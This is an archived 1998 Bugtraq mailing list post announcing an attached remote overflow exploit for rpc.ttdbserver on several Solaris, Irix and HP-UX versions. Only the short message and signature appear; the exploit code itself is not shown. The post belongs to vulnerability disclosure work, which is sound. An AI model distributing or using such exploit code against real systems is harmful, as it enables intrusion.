
Bugtraq mailing list archives

rpc.ttdbserver remote overflow exploit
From: jkwilli2 () UNITY NCSU EDU (Ken Williams)
Date: Mon, 5 Oct 1998 10:38:45 -0400



Hello,

Attached is rpc.ttdbserver remote overflow exploit code.  Several
versions of Solaris, Irix, and HP-UX are vulnerable.  Read the exploit
code comments for more details.


Regards,

Ken Williams

Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml
E.H.A.P. Corporation  http://www.ehap.org/  ehap () ehap org info () ehap org
NCSU Comp Sci Dept    http://www.csc.ncsu.edu/ jkwilli2 () adm csc ncsu edu
PGP DSS/DH/RSA Keys   http://www4.ncsu.edu/~jkwilli2/pgpkey/



Attachment: rpc.ttdbserver.c


